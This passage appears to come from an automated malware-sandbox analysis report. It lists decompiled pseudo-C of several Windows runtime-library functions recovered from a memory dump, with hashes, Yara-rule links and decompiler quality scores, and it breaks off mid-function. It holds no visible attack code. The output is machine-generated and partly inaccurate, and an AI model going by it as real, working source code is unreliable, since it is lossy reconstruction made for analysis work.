                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                        • API String ID: 0-865735534
                                                                        • Opcode ID: 41d08f2b26ceeb3efed5c4a7b151db6e11083ff66a9dbbce502f4492095b203d
                                                                        • Instruction ID: 307ed415eedc9e5273c214e27b8dd8c52215d96facef7024fef7ef343a08129f
                                                                        • Opcode Fuzzy Hash: 41d08f2b26ceeb3efed5c4a7b151db6e11083ff66a9dbbce502f4492095b203d
                                                                        • Instruction Fuzzy Hash: 60A1F171A04A069FEB36CFA9C455B7EB7E4BF88724F04456EE9468F6D0DB30D8418B90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014D2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 63%
                                                                        			E014D2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x15c5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x15c7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E015197C0();
				}
				if( *0x15c79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x15c79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01501624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E014F7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0156FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01519520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0150E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0152DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x15c6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x15c6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01519980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E015195D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E014F7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E014F7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01557016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0156FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x15c5350;
							if(_t109 != 0x15c5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0156FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01565720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                        0x014d2d8a
                                                                        0x014d2d8a
                                                                        0x014d2d92
                                                                        0x014d2d96
                                                                        0x014d2d9e
                                                                        0x014d2da0
                                                                        0x014d2da3
                                                                        0x014d2da5
                                                                        0x014d2da8
                                                                        0x014d2dab
                                                                        0x014d2db2
                                                                        0x0152f9aa
                                                                        0x0152f9ab
                                                                        0x0152f9ae
                                                                        0x0152f9ae
                                                                        0x014d2db8
                                                                        0x014d2dc2
                                                                        0x0152f9b9
                                                                        0x0152f9be
                                                                        0x0152f9bf
                                                                        0x0152f9bf
                                                                        0x014d2dcf
                                                                        0x0152f9c9
                                                                        0x014d2dd5
                                                                        0x014d2dd5
                                                                        0x014d2dd5
                                                                        0x014d2dde
                                                                        0x014d2de1
                                                                        0x014d2e70
                                                                        0x014d2e72
                                                                        0x014d2e72
                                                                        0x014d2de7
                                                                        0x014d2deb
                                                                        0x014d2e7c
                                                                        0x014d2e83
                                                                        0x014d2e85
                                                                        0x014d2e8b
                                                                        0x014d2e8d
                                                                        0x014d2e92
                                                                        0x014d2e92
                                                                        0x014d2e85
                                                                        0x014d2df1
                                                                        0x014d2df7
                                                                        0x014d2df9
                                                                        0x014d2df9
                                                                        0x014d2dfc
                                                                        0x014d2dff
                                                                        0x014d2e02
                                                                        0x00000000
                                                                        0x014d2e05
                                                                        0x014d2e0c
                                                                        0x0152f9d9
                                                                        0x014d2e12
                                                                        0x014d2e12
                                                                        0x014d2e12
                                                                        0x014d2e1a
                                                                        0x0152f9e3
                                                                        0x0152f9e9
                                                                        0x0152f9f0
                                                                        0x0152f9f6
                                                                        0x0152f9f8
                                                                        0x0152f9f8
                                                                        0x0152f9f0
                                                                        0x014d2e23
                                                                        0x0152fa02
                                                                        0x0152fa03
                                                                        0x0152fa05
                                                                        0x0152fa06
                                                                        0x00000000
                                                                        0x014d2e29
                                                                        0x014d2e29
                                                                        0x014d2e2e
                                                                        0x014d2e34
                                                                        0x014d2e3e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014d2e44
                                                                        0x014d2e47
                                                                        0x014d2e4d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014d2e4f
                                                                        0x014d2e54
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014d2e5a
                                                                        0x014d2e5f
                                                                        0x014d2e9a
                                                                        0x014d2ea4
                                                                        0x014d2ea5
                                                                        0x014d2ea8
                                                                        0x014d2eaf
                                                                        0x014d2eb2
                                                                        0x014d2eb5
                                                                        0x0152fae9
                                                                        0x0152faeb
                                                                        0x0152faed
                                                                        0x0152faef
                                                                        0x0152faf7
                                                                        0x0152faf8
                                                                        0x0152fafd
                                                                        0x0152faff
                                                                        0x0152fb04
                                                                        0x0152fb04
                                                                        0x0152faff
                                                                        0x014d2ec0
                                                                        0x014d2ec4
                                                                        0x014d2ec6
                                                                        0x014d2ec8
                                                                        0x0152fb14
                                                                        0x0152fb18
                                                                        0x0152fb1e
                                                                        0x0152fb21
                                                                        0x0152fb21
                                                                        0x014d2ece
                                                                        0x014d2ece
                                                                        0x014d2ece
                                                                        0x014d2ed7
                                                                        0x014d2e61
                                                                        0x014d2e63
                                                                        0x0152fa6b
                                                                        0x0152fa71
                                                                        0x0152fa76
                                                                        0x0152fa78
                                                                        0x0152fa8a
                                                                        0x0152fa7a
                                                                        0x0152fa83
                                                                        0x0152fa83
                                                                        0x0152fa8f
                                                                        0x0152fa91
                                                                        0x0152fa97
                                                                        0x0152fa9d
                                                                        0x0152faa4
                                                                        0x0152faaa
                                                                        0x0152faaf
                                                                        0x0152fab1
                                                                        0x0152fac3
                                                                        0x0152fab3
                                                                        0x0152fabc
                                                                        0x0152fabc
                                                                        0x0152fac8
                                                                        0x0152facb
                                                                        0x0152fadf
                                                                        0x0152fadf
                                                                        0x0152facb
                                                                        0x0152faa4
                                                                        0x0152fa91
                                                                        0x014d2e6f
                                                                        0x014d2e6f
                                                                        0x014d2e5f
                                                                        0x0152fa13
                                                                        0x0152fa15
                                                                        0x0152fa17
                                                                        0x0152fa1f
                                                                        0x0152fa21
                                                                        0x0152fa22
                                                                        0x0152fa25
                                                                        0x0152fa28
                                                                        0x0152fa2f
                                                                        0x0152fa2f
                                                                        0x0152fa2a
                                                                        0x0152fa2a
                                                                        0x0152fa2a
                                                                        0x0152fa31
                                                                        0x0152fa34
                                                                        0x0152fa36
                                                                        0x0152fa3c
                                                                        0x0152fa3e
                                                                        0x0152fa41
                                                                        0x0152fa43
                                                                        0x0152fa45
                                                                        0x0152fa45
                                                                        0x0152fa41
                                                                        0x0152fa3c
                                                                        0x0152fa4a
                                                                        0x0152fa4f
                                                                        0x0152fa51
                                                                        0x0152fa53
                                                                        0x0152fa56
                                                                        0x0152fa5b
                                                                        0x0152fa5e
                                                                        0x00000000
                                                                        0x0152fa5e
                                                                        0x014d2e23

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RTL: Re-Waiting
                                                                        • API String ID: 0-316354757
                                                                        • Opcode ID: a9890a74c02c3ccf649a9d33e2f3d0ee04f85fcd74a9345ccb5fe10452e77394
                                                                        • Instruction ID: c3887e0c85ff74f1384e5f71a103ff35a80a22c95a2be64e14e63b68b42f6570
                                                                        • Opcode Fuzzy Hash: a9890a74c02c3ccf649a9d33e2f3d0ee04f85fcd74a9345ccb5fe10452e77394
                                                                        • Instruction Fuzzy Hash: 19615332A006119FEB22CF6CD860B7EBBB4FB46720F14066BD9119B2E1C7B499028781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015A0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E015A0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0159FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E015A1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01519730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0159A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0159A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x15c8b04 >> 0x14) + (_v44 -  *0x15c8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E014F7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0159138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E014F7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0158FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x15c8724 & 0x00000008) != 0) {
						E015952F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E015A15B5(0x15c8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                        0x015a0eb7
                                                                        0x015a0eb9
                                                                        0x015a0ec0
                                                                        0x015a0ec2
                                                                        0x015a0ecd
                                                                        0x015a105b
                                                                        0x015a105b
                                                                        0x015a1061
                                                                        0x015a1066
                                                                        0x015a1066
                                                                        0x015a106b
                                                                        0x015a1073
                                                                        0x015a1073
                                                                        0x015a0ed3
                                                                        0x015a0ed6
                                                                        0x015a0edc
                                                                        0x015a0ee0
                                                                        0x015a0ee7
                                                                        0x015a0ef0
                                                                        0x015a0ef5
                                                                        0x015a0efa
                                                                        0x015a0efc
                                                                        0x015a0efd
                                                                        0x015a0f03
                                                                        0x015a0f04
                                                                        0x015a0f06
                                                                        0x015a0f07
                                                                        0x015a0f09
                                                                        0x015a0f0e
                                                                        0x015a0f14
                                                                        0x015a0f23
                                                                        0x015a0f2d
                                                                        0x015a0f34
                                                                        0x015a0f34
                                                                        0x015a0f14
                                                                        0x015a0f52
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015a0f58
                                                                        0x015a0f73
                                                                        0x015a0f74
                                                                        0x015a0f79
                                                                        0x015a0f7d
                                                                        0x015a0f80
                                                                        0x015a0f86
                                                                        0x015a0fab
                                                                        0x015a0fb5
                                                                        0x015a0fc6
                                                                        0x015a0fd1
                                                                        0x015a0fe3
                                                                        0x015a0fd3
                                                                        0x015a0fdc
                                                                        0x015a0fdc
                                                                        0x015a0feb
                                                                        0x015a1009
                                                                        0x015a1009
                                                                        0x015a1015
                                                                        0x015a1027
                                                                        0x015a1017
                                                                        0x015a1020
                                                                        0x015a1020
                                                                        0x015a102f
                                                                        0x015a103c
                                                                        0x015a103c
                                                                        0x015a1048
                                                                        0x015a1050
                                                                        0x015a1050
                                                                        0x015a1055
                                                                        0x00000000
                                                                        0x015a1055
                                                                        0x015a0f88
                                                                        0x015a0f9e
                                                                        0x015a0fa2
                                                                        0x015a0fa9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015a0fa9
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `
                                                                        • API String ID: 0-2679148245
                                                                        • Opcode ID: f167bea6ec8b7667d7b6bcdf4703654b2ff3335e73d84e00c69d1d363f522c4c
                                                                        • Instruction ID: ed0b825f285020f853ec256b26bcfb9af6d9ee9f0f9a654e8cc23568c30de934
                                                                        • Opcode Fuzzy Hash: f167bea6ec8b7667d7b6bcdf4703654b2ff3335e73d84e00c69d1d363f522c4c
                                                                        • Instruction Fuzzy Hash: ED51BA702847428FE725DF28D9C0B1FBBE9FBC4214F44092DFA929B290D670E805CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0150F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E0150F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E014F4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01519830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01519990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E015195D0();
							goto L11;
						} else {
							_t109 = L014F4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0151F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E015195D0();
										L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                        0x0150f0d3
                                                                        0x0150f0d9
                                                                        0x0150f0e0
                                                                        0x0150f0e7
                                                                        0x0150f0f2
                                                                        0x0150f0f4
                                                                        0x0150f0f8
                                                                        0x0150f100
                                                                        0x0150f108
                                                                        0x0150f10d
                                                                        0x0150f115
                                                                        0x0150f116
                                                                        0x0150f11f
                                                                        0x0150f123
                                                                        0x0150f124
                                                                        0x0150f12c
                                                                        0x0150f130
                                                                        0x0150f134
                                                                        0x0150f13d
                                                                        0x0150f144
                                                                        0x0150f14b
                                                                        0x0150f152
                                                                        0x0154bab0
                                                                        0x0154bab0
                                                                        0x0150f158
                                                                        0x0150f158
                                                                        0x0150f15a
                                                                        0x0150f160
                                                                        0x0150f165
                                                                        0x0150f166
                                                                        0x0150f16f
                                                                        0x0150f173
                                                                        0x0154baa7
                                                                        0x0154baa7
                                                                        0x0154baab
                                                                        0x00000000
                                                                        0x0150f179
                                                                        0x0150f18d
                                                                        0x0150f191
                                                                        0x0154baa2
                                                                        0x00000000
                                                                        0x0150f197
                                                                        0x0150f19b
                                                                        0x0150f1a2
                                                                        0x0150f1a9
                                                                        0x0150f1af
                                                                        0x0150f1b2
                                                                        0x0150f1b6
                                                                        0x0150f1b9
                                                                        0x0150f1c4
                                                                        0x0150f1d8
                                                                        0x0150f1df
                                                                        0x0150f1e3
                                                                        0x0150f1eb
                                                                        0x0150f1ee
                                                                        0x0150f1f4
                                                                        0x0150f20f
                                                                        0x0154bab7
                                                                        0x0154babb
                                                                        0x0154bacc
                                                                        0x0154bad1
                                                                        0x0150f215
                                                                        0x0150f218
                                                                        0x0150f226
                                                                        0x0150f22b
                                                                        0x00000000
                                                                        0x0150f22b
                                                                        0x0150f1f6
                                                                        0x0150f1f6
                                                                        0x0150f1f9
                                                                        0x0150f1fb
                                                                        0x0150f1fb
                                                                        0x0150f1f4
                                                                        0x0150f191
                                                                        0x0150f173
                                                                        0x0150f152
                                                                        0x0150f203

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                        • Instruction ID: e1b1142abe78e198a8aa89f64fe67ecca10c031f19dc684c07995e1f5670ee9d
                                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                        • Instruction Fuzzy Hash: A251B071104711AFD321DF59C841A6BBBF8FF98714F00892EFA959B6A0E7B4E904CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01553540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E01553540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x15cd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01510BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01553706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0151FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01553540;
						E0151FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0152DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01560C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E015197C0();
					}
					return E0151B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01553971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01553884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0151FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01519650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01553787(_a4,  &_v352, _t80);
						}
					}
					L014F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E015195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                        0x01553552
                                                                        0x0155355a
                                                                        0x0155355d
                                                                        0x01553566
                                                                        0x01553567
                                                                        0x0155357e
                                                                        0x0155358f
                                                                        0x015535a1
                                                                        0x015535a5
                                                                        0x0155366b
                                                                        0x0155366b
                                                                        0x0155366d
                                                                        0x01553672
                                                                        0x01553679
                                                                        0x01553685
                                                                        0x0155368d
                                                                        0x0155369d
                                                                        0x015536a7
                                                                        0x015536b8
                                                                        0x015536c6
                                                                        0x015536c7
                                                                        0x015536dc
                                                                        0x015536e1
                                                                        0x015536e7
                                                                        0x015536e9
                                                                        0x015536e9
                                                                        0x01553703
                                                                        0x01553703
                                                                        0x015535b5
                                                                        0x015535c0
                                                                        0x015535c4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x015535ca
                                                                        0x015535d7
                                                                        0x015535e2
                                                                        0x015535e6
                                                                        0x015535e8
                                                                        0x015535f5
                                                                        0x015535fa
                                                                        0x01553603
                                                                        0x01553604
                                                                        0x01553609
                                                                        0x0155360a
                                                                        0x01553612
                                                                        0x01553613
                                                                        0x0155361e
                                                                        0x01553622
                                                                        0x01553628
                                                                        0x0155362f
                                                                        0x0155362f
                                                                        0x01553636
                                                                        0x01553638
                                                                        0x0155363b
                                                                        0x01553642
                                                                        0x01553642
                                                                        0x01553636
                                                                        0x01553657
                                                                        0x01553657
                                                                        0x0155365c
                                                                        0x01553662
                                                                        0x01553669
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.729115737.00000000014B0000.00000040.00000001.sdmp, Offset: 014B0000, based on PE: true
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: 7c4763ecb9c2393cad8b1e59847cfa9c16bb63acacfdfbd0fabc867e26e6726d
                                                                        • Instruction ID: 91f10ea3b0a7d0b9dab60e5dd5b1711f62f82f2a6b7fdbe1ba87d9715135fc52
                                                                        • Opcode Fuzzy Hash: 7c4763ecb9c2393cad8b1e59847cfa9c16bb63acacfdfbd0fabc867e26e6726d
                                                                        • Instruction Fuzzy Hash: 3B4135B2D0052E9BDB619A50CC90FDEB77CBB54754F0045A6EA09AF240DB309E88CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 015A05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E015A05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E015A07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
